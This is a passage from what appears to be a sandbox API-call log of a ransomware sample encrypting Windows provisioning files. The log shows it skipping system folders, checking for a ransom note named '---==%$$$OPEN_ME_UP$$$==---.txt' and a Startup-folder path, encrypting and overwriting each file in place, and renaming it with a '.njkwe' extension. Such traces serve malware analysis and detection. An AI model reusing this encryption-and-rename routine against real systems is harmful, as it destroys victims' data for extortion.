Size=0x400) returned 0xc472e0 [0078.029] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\28__Connections_Cellular_Hutchison - 3 (Austria)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 186 [0078.029] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\28__Connections_Cellular_Hutchison - 3 (Austria)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\28__connections_cellular_hutchison - 3 (austria)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\28__Connections_Cellular_Hutchison - 3 (Austria)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\28__connections_cellular_hutchison - 3 (austria)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.030] GetProcessHeap () returned 0xbe0000 [0078.030] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.030] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90ac6903, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90ac6903, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90ac6903, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2e3, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="290__Connections_Cellular_KPN-Hi (Netherlands)_i8$(__MVID)@WAP.provxml", cAlternateFileName="290__C~1.PRO")) returned 1 [0078.030] lstrcmpiW (lpString1="290__Connections_Cellular_KPN-Hi (Netherlands)_i8$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.030] lstrcmpiW (lpString1="290__Connections_Cellular_KPN-Hi (Netherlands)_i8$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.030] lstrcmpiW (lpString1="290__Connections_Cellular_KPN-Hi (Netherlands)_i8$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.030] lstrcmpiW (lpString1="290__Connections_Cellular_KPN-Hi (Netherlands)_i8$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.030] lstrcmpiW (lpString1="290__Connections_Cellular_KPN-Hi (Netherlands)_i8$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.030] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\290__Connections_Cellular_KPN-Hi (Netherlands)_i8$(__MVID)@WAP.provxml") returned 164 [0078.030] StrStrIW (lpFirst="290__Connections_Cellular_KPN-Hi (Netherlands)_i8$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.030] lstrcmpW (lpString1="290__Connections_Cellular_KPN-Hi (Netherlands)_i8$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.030] lstrcmpW (lpString1="290__Connections_Cellular_KPN-Hi (Netherlands)_i8$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.030] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\290__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.030] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\290__Connections_Cellular_KPN-Hi (Netherlands)_i8$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\290__connections_cellular_kpn-hi (netherlands)_i8$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.031] GetTickCount () returned 0x1153d73 [0078.031] GetTickCount () returned 0x1153d73 [0078.031] GetTickCount () returned 0x1153d73 [0078.031] GetTickCount () returned 0x1153d73 [0078.031] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.031] GetProcessHeap () returned 0xbe0000 [0078.031] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.031] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2e3, lpOverlapped=0x0) returned 1 [0078.035] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd1d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.035] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2e3, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2e3, lpOverlapped=0x0) returned 1 [0078.035] GetProcessHeap () returned 0xbe0000 [0078.035] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.035] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.035] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.035] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.035] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.035] CloseHandle (hObject=0x43c) returned 1 [0078.036] GetProcessHeap () returned 0xbe0000 [0078.036] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.036] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\290__Connections_Cellular_KPN-Hi (Netherlands)_i8$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 184 [0078.036] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\290__Connections_Cellular_KPN-Hi (Netherlands)_i8$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\290__connections_cellular_kpn-hi (netherlands)_i8$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\290__Connections_Cellular_KPN-Hi (Netherlands)_i8$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\290__connections_cellular_kpn-hi (netherlands)_i8$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.036] GetProcessHeap () returned 0xbe0000 [0078.036] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.036] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90ac6903, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90ac6903, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90ac6903, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2d2, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="291__Connections_Cellular_KPN-Hi (Netherlands)_i9$(__MVID)@WAP.provxml", cAlternateFileName="291__C~1.PRO")) returned 1 [0078.036] lstrcmpiW (lpString1="291__Connections_Cellular_KPN-Hi (Netherlands)_i9$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.036] lstrcmpiW (lpString1="291__Connections_Cellular_KPN-Hi (Netherlands)_i9$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.036] lstrcmpiW (lpString1="291__Connections_Cellular_KPN-Hi (Netherlands)_i9$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.036] lstrcmpiW (lpString1="291__Connections_Cellular_KPN-Hi (Netherlands)_i9$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.036] lstrcmpiW (lpString1="291__Connections_Cellular_KPN-Hi (Netherlands)_i9$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.036] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\291__Connections_Cellular_KPN-Hi (Netherlands)_i9$(__MVID)@WAP.provxml") returned 164 [0078.037] StrStrIW (lpFirst="291__Connections_Cellular_KPN-Hi (Netherlands)_i9$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.037] lstrcmpW (lpString1="291__Connections_Cellular_KPN-Hi (Netherlands)_i9$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.037] lstrcmpW (lpString1="291__Connections_Cellular_KPN-Hi (Netherlands)_i9$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.037] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\291__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.037] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\291__Connections_Cellular_KPN-Hi (Netherlands)_i9$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\291__connections_cellular_kpn-hi (netherlands)_i9$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.037] GetTickCount () returned 0x1153d73 [0078.037] GetTickCount () returned 0x1153d73 [0078.037] GetTickCount () returned 0x1153d73 [0078.037] GetTickCount () returned 0x1153d73 [0078.037] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.037] GetProcessHeap () returned 0xbe0000 [0078.037] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.037] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2d2, lpOverlapped=0x0) returned 1 [0078.043] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd2e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.043] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2d2, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2d2, lpOverlapped=0x0) returned 1 [0078.043] GetProcessHeap () returned 0xbe0000 [0078.043] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.043] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.043] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.043] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.043] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.044] CloseHandle (hObject=0x43c) returned 1 [0078.044] GetProcessHeap () returned 0xbe0000 [0078.044] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.044] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\291__Connections_Cellular_KPN-Hi (Netherlands)_i9$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 184 [0078.044] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\291__Connections_Cellular_KPN-Hi (Netherlands)_i9$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\291__connections_cellular_kpn-hi (netherlands)_i9$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\291__Connections_Cellular_KPN-Hi (Netherlands)_i9$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\291__connections_cellular_kpn-hi (netherlands)_i9$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.044] GetProcessHeap () returned 0xbe0000 [0078.044] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.044] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90aecb6b, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90aecb6b, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90aecb6b, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x294, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="292__Connections_Cellular_Tele2 (Netherlands)_i0$(__MVID)@WAP.provxml", cAlternateFileName="292__C~1.PRO")) returned 1 [0078.044] lstrcmpiW (lpString1="292__Connections_Cellular_Tele2 (Netherlands)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.044] lstrcmpiW (lpString1="292__Connections_Cellular_Tele2 (Netherlands)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.044] lstrcmpiW (lpString1="292__Connections_Cellular_Tele2 (Netherlands)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.045] lstrcmpiW (lpString1="292__Connections_Cellular_Tele2 (Netherlands)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.045] lstrcmpiW (lpString1="292__Connections_Cellular_Tele2 (Netherlands)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.045] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\292__Connections_Cellular_Tele2 (Netherlands)_i0$(__MVID)@WAP.provxml") returned 163 [0078.045] StrStrIW (lpFirst="292__Connections_Cellular_Tele2 (Netherlands)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.045] lstrcmpW (lpString1="292__Connections_Cellular_Tele2 (Netherlands)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.045] lstrcmpW (lpString1="292__Connections_Cellular_Tele2 (Netherlands)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.045] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\292__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.045] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\292__Connections_Cellular_Tele2 (Netherlands)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\292__connections_cellular_tele2 (netherlands)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.045] GetTickCount () returned 0x1153d82 [0078.045] GetTickCount () returned 0x1153d82 [0078.045] GetTickCount () returned 0x1153d82 [0078.045] GetTickCount () returned 0x1153d82 [0078.045] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.045] GetProcessHeap () returned 0xbe0000 [0078.045] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.045] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x294, lpOverlapped=0x0) returned 1 [0078.050] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd6c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.050] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x294, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x294, lpOverlapped=0x0) returned 1 [0078.051] GetProcessHeap () returned 0xbe0000 [0078.051] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.051] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.051] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.051] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.051] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.051] CloseHandle (hObject=0x43c) returned 1 [0078.051] GetProcessHeap () returned 0xbe0000 [0078.051] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.051] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\292__Connections_Cellular_Tele2 (Netherlands)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 183 [0078.051] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\292__Connections_Cellular_Tele2 (Netherlands)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\292__connections_cellular_tele2 (netherlands)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\292__Connections_Cellular_Tele2 (Netherlands)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\292__connections_cellular_tele2 (netherlands)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.052] GetProcessHeap () returned 0xbe0000 [0078.052] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.052] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90aecb6b, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90aecb6b, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90aecb6b, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x28a, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="293__Connections_Cellular_Tele2 (Netherlands)_i1$(__MVID)@WAP.provxml", cAlternateFileName="293__C~1.PRO")) returned 1 [0078.052] lstrcmpiW (lpString1="293__Connections_Cellular_Tele2 (Netherlands)_i1$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.052] lstrcmpiW (lpString1="293__Connections_Cellular_Tele2 (Netherlands)_i1$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.052] lstrcmpiW (lpString1="293__Connections_Cellular_Tele2 (Netherlands)_i1$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.052] lstrcmpiW (lpString1="293__Connections_Cellular_Tele2 (Netherlands)_i1$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.052] lstrcmpiW (lpString1="293__Connections_Cellular_Tele2 (Netherlands)_i1$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.052] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\293__Connections_Cellular_Tele2 (Netherlands)_i1$(__MVID)@WAP.provxml") returned 163 [0078.052] StrStrIW (lpFirst="293__Connections_Cellular_Tele2 (Netherlands)_i1$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.052] lstrcmpW (lpString1="293__Connections_Cellular_Tele2 (Netherlands)_i1$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.052] lstrcmpW (lpString1="293__Connections_Cellular_Tele2 (Netherlands)_i1$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.052] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\293__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.052] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\293__Connections_Cellular_Tele2 (Netherlands)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\293__connections_cellular_tele2 (netherlands)_i1$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.053] GetTickCount () returned 0x1153d82 [0078.053] GetTickCount () returned 0x1153d82 [0078.053] GetTickCount () returned 0x1153d82 [0078.053] GetTickCount () returned 0x1153d82 [0078.053] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.053] GetProcessHeap () returned 0xbe0000 [0078.053] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.053] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x28a, lpOverlapped=0x0) returned 1 [0078.054] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd76, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: 